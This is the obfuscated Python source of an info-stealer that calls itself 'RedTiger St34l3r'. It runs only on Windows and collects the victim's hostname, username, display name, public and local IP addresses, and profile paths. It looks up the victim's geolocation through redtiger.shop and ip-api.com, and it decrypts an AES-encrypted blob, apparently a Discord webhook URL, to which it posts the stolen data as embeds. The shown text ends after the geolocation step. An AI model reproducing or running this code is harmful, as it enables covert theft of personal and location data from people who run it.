
import sys

def OOIFRAOITVFFRCSCYMMXAMYSTAQAHCPGHIIIYAFJNANVSRVHAOYKSGQBKCQBAWWXNLUTWYJOQSJSKHPSUWUCCXJNPIO():
    def JWATXKQEBKQBUGFSGNJBWVYBERQSVCPYGCMHVMNFMWYBGKMEIGYKBOFUOHGRAJJFCNEXTQO():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        XKGNWBAVANCWKUWDYJCQTKKERUQQQQRFCPBELUIJUBMMGWDCHC = JWATXKQEBKQBUGFSGNJBWVYBERQSVCPYGCMHVMNFMWYBGKMEIGYKBOFUOHGRAJJFCNEXTQO()
        if XKGNWBAVANCWKUWDYJCQTKKERUQQQQRFCPBELUIJUBMMGWDCHC == True:
            return XKGNWBAVANCWKUWDYJCQTKKERUQQQQRFCPBELUIJUBMMGWDCHC
    except:
        return True
    
if OOIFRAOITVFFRCSCYMMXAMYSTAQAHCPGHIIIYAFJNANVSRVHAOYKSGQBKCQBAWWXNLUTWYJOQSJSKHPSUWUCCXJNPIO() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
from discord import SyncWebhook
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def ZGYNSBGUPETRSISEKWFAJWWZSPUATSPWQIVJLCACNNGQOHRDNIJQHMENWXICPHEADUPNVJPTSKWXNOCRTSBYGVKMIZSEQIWNHNJ(): pass
def ABGMMVMXWLWRKGWBEAWMQORZUJBZDCIUGZWPPQLHPNMUQVVUBDYVJBUHWMDQLMZWTEPAIVGEIESIFHMEETIYEYHSFMQPC(): pass
def DMYTGGCZDOHBCHSEAIEWMSQUYBOAOEKMGDNZFFUZNJYKLBYLBHMPJTZLQ(): pass
def UCNSRVTVZSMFYVBLOTAGVPGSUMLJNAEFRDBJUPYSJZZTTQYOSNVDXASNWEGMMUQXKO(): pass
def JNQLOXZWOKYUXRMUNSGEDAMRMEEPXPLQACIRTMOYVDJSRXQQSNCXJKDKYOKZCOFB(): pass
def UWETGQVACNQJZWYNMCPEGTYFXDRTJZHXNFQEAPBBPWWMAKXOSDKTXUKFPHFLIYSLKOLOOQSSFSSSLRNSWLIWSJEDYPXNCZRZ(): pass
def NZXGRFJJOIQPYWWMWSKYRGADBCFRISMKEDKIRHMEUQOCESGMQFYSNURVXINEPKABVQHOQUXYISYQJOVCDIFAAKBHCYPOEY(): pass
def TSVYJLRGFSGSMATWXJQUAWARRIPZUXCKMKJZTCHLNLMHUNCEQJVIKBA(): pass
def ULAQJDJEVDGHWQBZLSUBFVJOCRSETDPWWVTPMBHZXMYIWSTMXGASYTAUXXVPGKZIITKOZIMKJWIKEDIHLBHNUFYHHY(): pass
def XUVKVBKKKTUEDDAZTIRVCYQNYGDBEAJIDHFJWZSGLXKYXOSUGQENUH(): pass
def SVZIKSARLWVCSRMNYTOFBNOXQEOXKSMSVJGBGMBGVPIXEBKQTKIZM(): pass
def OQAHDTFCHIYPUNZTYHUGIDKQUTAPXYPJOEGQUQBTMVFCUDTBDJUGQIIMSQERGNYXSOTMXVWMJWPVEJEOOJQRXXAWNRCMP(): pass
def NOLGTRFQJOJGOSQTCWSIELFWECNSXYBMCUCBWLBBSBUHCDGBUMEYTKUYFMLYZNFEP(): pass
def GLUZZXBURCVNPXUTJIMCSLTDPTDWWKCRXUUQPMSTXKVQZTYUXLUXUXYCXZO(): pass
def TZQFAUVDVHAYDRSHXMEIZKEDQMHYLNXCQLNREDRMBHUXAWQWHOJOTJGBTGNXKU(): pass
def TSPQNORFFNGRPBIEFRTDQDWPMYMHZANMZRBMXFQJZYDXZIYESEYJQRUUPMNQNZTTHFI(): pass
def HXWIGCWGUFHAGSTJRVFTEFXPBRTYRTWZTSZGNTAYCGDPZRJZRDRAXBXZSTDHHYTQGYGYSYCMOLNPNEOISWDENIVUIXBT(): pass
def JFVORJZKMRSJHAUEFTJXWFWAKSXMETNQCKBIXUNLQJRPJBFTJUMAJQCVVZOJBOTPSNVIRZJO(): pass
def MKTZTIKFLPRKVJLAPUWPABUYAKJDTDKPJRNIQJILVLUPIQQAXYVREFBIEPAHQDYXHJTCJHAPRDREHNUMUVLSOBTA(): pass
def LOYHROBUNKSGVOKNXQNRBOCTDJGRVHZJFATSFCNHUPQAMPCCXQOYCRYTJVRHDSO(): pass

def HWYMTTLYXHZNJDFTQBEWCXJUPHJQSJVEBZQXYKAMEMIKQDFISZGNNYAIUPOFOR(w3bh00k_ur1, title=None, description=None):
    try:
        client = SyncWebhook.from_url(w3bh00k_ur1)
        embed = discord.Embed(
            title=title,
            description=description,
            color= XPAJVRCFMRTODIHPRPMQELYNIGHPNKWHQUGUJYPRLFOTYDLYDJUQCIBWMBEFJMHUETNYYAYFSBPICTBRGXRJRZHBW
        )
        embed.set_footer(text=EYXHIFDNPLCNJBNHHFJGNMUEJBBVNTZLSCWYQYGEWLFYMCOMOCWCZPGRRVBQRZPBOVHZE, icon_url=GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP)
        client.send(embed=embed, username=OQKKSBKULTVXSMJTQTJIRXLOQDPHTFIBVNLCBWOIFVQBCAFKTAEGPQPZDWRIXWKZQHBGQZVUGSFPFGTAZNPUFCBLRGRNSTZTBVUL, avatar_url=GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP)
    except: pass

def AWNHPNBOYCBOILOXOWLLSRKXMSTOWJIVKNTEGLCDHYRWFMIRONGXTUFZPUUSIXVEDIWZZJZR(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def OURHZGOXJTRYKCGDDLYVZLIUUDJEJRHNNPGTRDVVCSVNZTQOTIWKUOKZQPUGBIBVBQQFD():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def XWARXVUXNUNJINBVTERSKQOLBYYKFUBFGZNUDRKGKFMPAXBRGLNJTJH(GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY, OCUNAAEFRDHQEKMFCXBFMIYQZQKKJPLIXKNAFUMDUGSTYMSGSVFOCEHTJKGZEPIFLFKRTQYIGDVCQPQRNRRYYMTKOCSKOOG):
    def EEVUHDSAQADOIJFMRQEAQTTKXNWUDYMHSXGWGRBIAKKSHVRKHZJGUNBMFIQHHOAPTQMAWQVRGT(MXGTNJPQHVPXHRKQBGQWBSNOIIHJYBHQTDMCPGFBBYAUBLZYYRTPBCHCKGQMPMVFZHFCUXUJLIAVKEKLP, MBNLSOVDHDDBDKJAANLFAJQGWQSVSWFXSSIYDNNJXFNYHPSJFWDPSXMHYJWSLJQSQJTKHDABETLIZONCAKBSMWOE):
        CLNQAWAHIEWAXGOQNKIAECTGRXMQUQXYOGTGCXVFCIBMEWJUBSAHODLKHSHTYJUHRLVXJKOXJCMOJNULYGG = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=MBNLSOVDHDDBDKJAANLFAJQGWQSVSWFXSSIYDNNJXFNYHPSJFWDPSXMHYJWSLJQSQJTKHDABETLIZONCAKBSMWOE, iterations=100000, backend=default_backend())
        if isinstance(MXGTNJPQHVPXHRKQBGQWBSNOIIHJYBHQTDMCPGFBBYAUBLZYYRTPBCHCKGQMPMVFZHFCUXUJLIAVKEKLP, str):  
            MXGTNJPQHVPXHRKQBGQWBSNOIIHJYBHQTDMCPGFBBYAUBLZYYRTPBCHCKGQMPMVFZHFCUXUJLIAVKEKLP = MXGTNJPQHVPXHRKQBGQWBSNOIIHJYBHQTDMCPGFBBYAUBLZYYRTPBCHCKGQMPMVFZHFCUXUJLIAVKEKLP.encode()  
        return CLNQAWAHIEWAXGOQNKIAECTGRXMQUQXYOGTGCXVFCIBMEWJUBSAHODLKHSHTYJUHRLVXJKOXJCMOJNULYGG.derive(MXGTNJPQHVPXHRKQBGQWBSNOIIHJYBHQTDMCPGFBBYAUBLZYYRTPBCHCKGQMPMVFZHFCUXUJLIAVKEKLP)

    GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY_data = base64.b64decode(GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY)
    MBNLSOVDHDDBDKJAANLFAJQGWQSVSWFXSSIYDNNJXFNYHPSJFWDPSXMHYJWSLJQSQJTKHDABETLIZONCAKBSMWOE = GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY_data[:16]
    GDMGWPTPUFAMEUKWXCWZBNQFWIMKUBKDDFGUNZPIEDAJHWRXRBMHXFBBGPJVTRCPQTPOVSSCGPBSLMOWHZPOEEOPB = GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY_data[16:32]
    GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY_data = GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY_data[32:]
    RTCSFOEDKFVILKVFHPGRSUUDOVHFXWUBYQAMWCTKWJHPIWSDZYREBENEZLDHGBVUKDVVOORRFKZPARVFAOPAWIJVZ = EEVUHDSAQADOIJFMRQEAQTTKXNWUDYMHSXGWGRBIAKKSHVRKHZJGUNBMFIQHHOAPTQMAWQVRGT(OCUNAAEFRDHQEKMFCXBFMIYQZQKKJPLIXKNAFUMDUGSTYMSGSVFOCEHTJKGZEPIFLFKRTQYIGDVCQPQRNRRYYMTKOCSKOOG, MBNLSOVDHDDBDKJAANLFAJQGWQSVSWFXSSIYDNNJXFNYHPSJFWDPSXMHYJWSLJQSQJTKHDABETLIZONCAKBSMWOE)
    VFBXXCVDNUGYINHMVEXEHZALEYPIAKFGHQOQTYKHBLMSEYURYZVDHFJ = Cipher(algorithms.AES(RTCSFOEDKFVILKVFHPGRSUUDOVHFXWUBYQAMWCTKWJHPIWSDZYREBENEZLDHGBVUKDVVOORRFKZPARVFAOPAWIJVZ), modes.CBC(GDMGWPTPUFAMEUKWXCWZBNQFWIMKUBKDDFGUNZPIEDAJHWRXRBMHXFBBGPJVTRCPQTPOVSSCGPBSLMOWHZPOEEOPB), backend=default_backend())
    EBXQXGRMNEFBBUBZCUVCNEZECYWJXZYORGGVTQTAMDFHSJUJBELQFLSAMMJYCIKKUCDEPGXCUMIYSZBWXKYSHYKFIOMTYRSTPEQX = VFBXXCVDNUGYINHMVEXEHZALEYPIAKFGHQOQTYKHBLMSEYURYZVDHFJ.decryptor()
    OCATWHZMFNQVHCJUZGKEQIVCFPTXNWUAACXGUAYMWOMGZLIVYMEWNPTMKCSBINEZQENZMUFIFEBBYMEWLKYIERUGANCLJJTIJOER = EBXQXGRMNEFBBUBZCUVCNEZECYWJXZYORGGVTQTAMDFHSJUJBELQFLSAMMJYCIKKUCDEPGXCUMIYSZBWXKYSHYKFIOMTYRSTPEQX.update(GXFUWCEAIOUPHTWZJYDZIGLIBKFAPICLVWXQLBDGCYJGERAJQUGQCOMGATKSXDKOTJRKNKTNKOVSDDRPVIKOGFUEOGJGEVTY_data) + EBXQXGRMNEFBBUBZCUVCNEZECYWJXZYORGGVTQTAMDFHSJUJBELQFLSAMMJYCIKKUCDEPGXCUMIYSZBWXKYSHYKFIOMTYRSTPEQX.finalize()
    LLYAIIWTVJIEOUYJFMTPZRUNAVGFUFTQSVOSVQFTKMNIFBWZKJHG = padding.PKCS7(128).unpadder()
    VZJFHFQKWNYOQQYIIILHIJQCJYFMLCEKBRKBZXRCCATFVZYGOEOQTOOHBHOBNDSNMJOBSEQHHYHZKYIODDBSH = LLYAIIWTVJIEOUYJFMTPZRUNAVGFUFTQSVOSVQFTKMNIFBWZKJHG.update(OCATWHZMFNQVHCJUZGKEQIVCFPTXNWUAACXGUAYMWOMGZLIVYMEWNPTMKCSBINEZQENZMUFIFEBBYMEWLKYIERUGANCLJJTIJOER) + LLYAIIWTVJIEOUYJFMTPZRUNAVGFUFTQSVOSVQFTKMNIFBWZKJHG.finalize()
    return VZJFHFQKWNYOQQYIIILHIJQCJYFMLCEKBRKBZXRCCATFVZYGOEOQTOOHBHOBNDSNMJOBSEQHHYHZKYIODDBSH.decode()

AWNHPNBOYCBOILOXOWLLSRKXMSTOWJIVKNTEGLCDHYRWFMIRONGXTUFZPUUSIXVEDIWZZJZR("")

try: BAZFYBLCPHMKRLJKCTLTBPOETMLPNCWWJKAMFTUJSLZDHEDZWVGUQDFTOUYKSFTXQOVYECOKFUAHIHQJMGQNXQISVUBLHJ    = socket.gethostname()
except: BAZFYBLCPHMKRLJKCTLTBPOETMLPNCWWJKAMFTUJSLZDHEDZWVGUQDFTOUYKSFTXQOVYECOKFUAHIHQJMGQNXQISVUBLHJ = "None"

try: TXTTHWUCUXJHXLTGMDDBDMDAVWKCAYJGXBNMOTIJFDVUZVTMKOQOWHXMYHRAUUJJGQYUIYXV    = os.getlogin()
except: TXTTHWUCUXJHXLTGMDDBDMDAVWKCAYJGXBNMOTIJFDVUZVTMKOQOWHXMYHRAUUJJGQYUIYXV = "None"

try: SHYWVTMHJCGBQSVVUHAMSBRFFTFEURAWKNLICCIXDZPXNFNXLBTEIBSNZCYJTTYY    = win32api.GetUserNameEx(win32api.NameDisplay)
except: SHYWVTMHJCGBQSVVUHAMSBRFFTFEURAWKNLICCIXDZPXNFNXLBTEIBSNZCYJTTYY = "None"

try: OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY = "None"

try: UKTMNCZXFDYOHZEDVSUTEDHADHWSSEDIMWGNNKVLXRZLAXZDBADHWNVHIQGKDDTOBULFTOPDAXQDKBCKDRMOIKDZAAJS    = socket.gethostbyname(socket.gethostname())
except: UKTMNCZXFDYOHZEDVSUTEDHADHWSSEDIMWGNNKVLXRZLAXZDBADHWNVHIQGKDDTOBULFTOPDAXQDKBCKDRMOIKDZAAJS = "None"

QWOUJKPWVGIVJMZCUGMWDTLFGCJMUSBDAHGIVBZAVLGTBIJDNIORXBLKTRWRXBUVYOYKAZJJBOQQJHMEDKNWGHVDQOPMJ = r"""
zTLDnlHKs1uFnjp5NBzK6ZHB0gndett89TDaDIyssflAtsgjn1oRT1W9EyznIClcaSxwUkaFcUvzuE0hbNM25SdD9D92Lv3NVASQRH5NwCKc57aAyCOGrNR5YIEwFxd2RgHxX+a/yhnE5uDCdIvluUtdtLLiqUUnq8ok7BgoLbMk1U4lR/w1l2rPbywDVbufa1mBuByR8Oo6cP4/6FurDQ==
"""

JTNJPTEXOMQUFUHSZNYJLCSSDLFJPYIOUNSUAQBTIXPPCZNTYLDDBDHHJVBBRIFOQODUBJOHBMYFLVXZKEIOOYRMMEOMCG            = "WNBHFQIjPqMCUktaeyAsmdwISMpnakHuNFEVjPHkuhlSwKQniPriwujcHCyjlxpoFXdFhqdYVpUsElhdXWryjbTGBadpVpphsYxfsCKhrmeQKspDxrnvJnxDsgPkvblFGQWKlisikNOMrjujnKYGsSMoD"
KCQGQJRZSTVXZOGOCDMZOHUNADOHOCHPMYEPNDUVAIWHFESNWGDEVPSWFKPDVGTNWJMYZIKMYFECXJQKPVSARXJSXCTRVYN        = "redtiger.shop"
XPAJVRCFMRTODIHPRPMQELYNIGHPNKWHQUGUJYPRLFOTYDLYDJUQCIBWMBEFJMHUETNYYAYFSBPICTBRGXRJRZHBW    = 0xa80505
OQKKSBKULTVXSMJTQTJIRXLOQDPHTFIBVNLCBWOIFVQBCAFKTAEGPQPZDWRIXWKZQHBGQZVUGSFPFGTAZNPUFCBLRGRNSTZTBVUL = "RedTiger St34l3r"
GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP   = "https://cdn.discordapp.com/attachments/1337898355279401023/1341890893858213908/RedTiger-Logo.png?ex=67b7a4c8&is=67b65348&hm=174ddbd80dd8570fa83779687def6eda441a7c12abd3765d970c1958ceeb1ec8&"
EYXHIFDNPLCNJBNHHFJGNMUEJBBVNTZLSCWYQYGEWLFYMCOMOCWCZPGRRVBQRZPBOVHZE    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
KHXTMXPDROTYNJUQQUXVUIJJMBTHICLFVYNFRXCCNFRTCRJOLDKLJANWJJCHVLLJMDKOUKDOZSFPTAYFMIYIPSGWIDYJROOMW   = {"text": EYXHIFDNPLCNJBNHHFJGNMUEJBBVNTZLSCWYQYGEWLFYMCOMOCWCZPGRRVBQRZPBOVHZE, "icon_url": GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP}
JHJKWSQPAMHXSASDEIGCRVCZPRDKCZAZXZBUAWHWDFCKBSLPXSLBNKUDYFLSYLBGYYLYEAUKMKSPKGYBJCAZD    = f'`{TXTTHWUCUXJHXLTGMDDBDMDAVWKCAYJGXBNMOTIJFDVUZVTMKOQOWHXMYHRAUUJJGQYUIYXV} "{OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY}"`'
HPZPFTJUMICLTXQGZGKHNCSONJDNKTSMVJQWNTYXLKMIJRMTXIVKTKNRYALPQCLWDLPAJQQJJFXCUIOVATCBVHR    = XWARXVUXNUNJINBVTERSKQOLBYYKFUBFGZNUDRKGKFMPAXBRGLNJTJH(QWOUJKPWVGIVJMZCUGMWDTLFGCJMUSBDAHGIVBZAVLGTBIJDNIORXBLKTRWRXBUVYOYKAZJJBOQQJHMEDKNWGHVDQOPMJ, JTNJPTEXOMQUFUHSZNYJLCSSDLFJPYIOUNSUAQBTIXPPCZNTYLDDBDHHJVBBRIFOQODUBJOHBMYFLVXZKEIOOYRMMEOMCG)

YQKTLEWKOUIHCGDPWIDZKGCTTNUMHSIIODHBQPLGCTZKJZTLDCNRZMFYSPNBLJDTYGRPJOGWSHADJCDDIBAOTYNDTJEBIZNKW         = os.getenv("WINDIR", None).replace(" ", "%20")
JCSCGRIOWEKWNCPUKBPXBMMZPHLWQGRGNBHLROCPOQMJCAWKIXDANWN     = os.getenv('USERPROFILE', None).replace(" ", "%20")
PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH   = os.getenv('LOCALAPPDATA', None).replace(" ", "%20")
SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN = os.getenv('APPDATA', None).replace(" ", "%20")

try:
    RGYYOQIAUGEEZSBVBBLQGNPBRRRQIUIUFHCHEYXPVXBJUWDQADAPXMWBNCSILSIPPHIGNBCHYBKLNMFPIAYXZPRWMI = requests.get(f"https://{KCQGQJRZSTVXZOGOCDMZOHUNADOHOCHPMYEPNDUVAIWHFESNWGDEVPSWFKPDVGTNWJMYZIKMYFECXJQKPVSARXJSXCTRVYN}/api/ip/ip={OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY}")
    JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL = RGYYOQIAUGEEZSBVBBLQGNPBRRRQIUIUFHCHEYXPVXBJUWDQADAPXMWBNCSILSIPPHIGNBCHYBKLNMFPIAYXZPRWMI.json()

    MZSGIZOTJAWXQOYPNRECAGAKAHYKACHKUIDHRHZGLNROZKQKFGJKBOAEQJPQBPBGVDQVXERIVAHKJALVHNR = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('country', "None")
    MZSGIZOTJAWXQOYPNRECAGAKAHYKACHKUIDHRHZGLNROZKQKFGJKBOAEQJPQBPBGVDQVXERIVAHKJALVHNR_code = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('country_code', "None")
    PKUDCAQYDRZEPSRXLSVJNRAUZJOHMDNQUTGXWGXNEGKKKFCYARZOGQPOTBTHLEPPVRNTOCTDHLZD = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('region', "None")
    PKUDCAQYDRZEPSRXLSVJNRAUZJOHMDNQUTGXWGXNEGKKKFCYARZOGQPOTBTHLEPPVRNTOCTDHLZD_code = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('region_code', "None")
    YJZIOEJLNVHBEWKQLEQKVPIWXYMZVIANIDKUWXYSGRTPIEGUHWLDXMSGOYUWRSFGOKPPWYJLLTBXYII = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('zip', "None")
    NVUSYXPWGTAHFRARZBKTIMCCYLZGWZAVHXQQHQSVBSYTBDRBGVMNELUZKACMMXULUU = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('city', "None")
    IGPNZGTPWFXHWSAKDCPRRUQDEHZAJNUFYBATGYLRQSSKQRWKLWTPJSNKLHLYRUDJODMOGBOAYOGSJOGQRAECWEMVHYHSGOHQH = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('latitude', "None")
    FTXPNKVNIPJGORBELQJKIFHGVNDMACJPEASURULBUOTVUUNCEBBGXWNGPKLMKCYRWFH = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('longitude', "None")
    ODIVNCURWJMXJGXLAMVSIORKNTJVBGEHXQTCEVPSCGUFPZOVGIOHJMQYIBZFHEORMLKFXBDCQEFLMXYPOWTKPMGSWWSXKHRHQKAZ = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('timezone', "None")
    CZBYHJUTONHGAJTRKRNEEOGOIWNGJWPGVNDOMPWDCZNFDXLFBFFZUBZOFTFVPNDXFUKVGGCISJYLCVTOETGUGBGCUQEKNT = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('isp', "None")
    ITPKUKVGVELMQYBHIHQAKAJQYHLRPSZLZAPVFIRENRAYTYMRKIEEOJQGVXLONBMKDA = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('org', "None")
    WWSVURMZFWFWUWZRKQYYQYTPVQRDFOKEGBQBLZWKEXTQCAFVZKSSNV = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('as', "None")
except:
    RGYYOQIAUGEEZSBVBBLQGNPBRRRQIUIUFHCHEYXPVXBJUWDQADAPXMWBNCSILSIPPHIGNBCHYBKLNMFPIAYXZPRWMI = requests.get(f"http://ip-api.com/json/{OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY}")
    JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL = RGYYOQIAUGEEZSBVBBLQGNPBRRRQIUIUFHCHEYXPVXBJUWDQADAPXMWBNCSILSIPPHIGNBCHYBKLNMFPIAYXZPRWMI.json()

    MZSGIZOTJAWXQOYPNRECAGAKAHYKACHKUIDHRHZGLNROZKQKFGJKBOAEQJPQBPBGVDQVXERIVAHKJALVHNR = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('country', "None")
    MZSGIZOTJAWXQOYPNRECAGAKAHYKACHKUIDHRHZGLNROZKQKFGJKBOAEQJPQBPBGVDQVXERIVAHKJALVHNR_code = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('countryCode', "None")
    PKUDCAQYDRZEPSRXLSVJNRAUZJOHMDNQUTGXWGXNEGKKKFCYARZOGQPOTBTHLEPPVRNTOCTDHLZD = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('regionName', "None")
    PKUDCAQYDRZEPSRXLSVJNRAUZJOHMDNQUTGXWGXNEGKKKFCYARZOGQPOTBTHLEPPVRNTOCTDHLZD_code = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('region', "None")
    YJZIOEJLNVHBEWKQLEQKVPIWXYMZVIANIDKUWXYSGRTPIEGUHWLDXMSGOYUWRSFGOKPPWYJLLTBXYII = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('zip', "None")
    NVUSYXPWGTAHFRARZBKTIMCCYLZGWZAVHXQQHQSVBSYTBDRBGVMNELUZKACMMXULUU = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('city', "None")
    IGPNZGTPWFXHWSAKDCPRRUQDEHZAJNUFYBATGYLRQSSKQRWKLWTPJSNKLHLYRUDJODMOGBOAYOGSJOGQRAECWEMVHYHSGOHQH = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('lat', "None")
    FTXPNKVNIPJGORBELQJKIFHGVNDMACJPEASURULBUOTVUUNCEBBGXWNGPKLMKCYRWFH = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('lon', "None")
    ODIVNCURWJMXJGXLAMVSIORKNTJVBGEHXQTCEVPSCGUFPZOVGIOHJMQYIBZFHEORMLKFXBDCQEFLMXYPOWTKPMGSWWSXKHRHQKAZ = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('timezone', "None")
    CZBYHJUTONHGAJTRKRNEEOGOIWNGJWPGVNDOMPWDCZNFDXLFBFFZUBZOFTFVPNDXFUKVGGCISJYLCVTOETGUGBGCUQEKNT = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('isp', "None")
    ITPKUKVGVELMQYBHIHQAKAJQYHLRPSZLZAPVFIRENRAYTYMRKIEEOJQGVXLONBMKDA = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('org', "None")
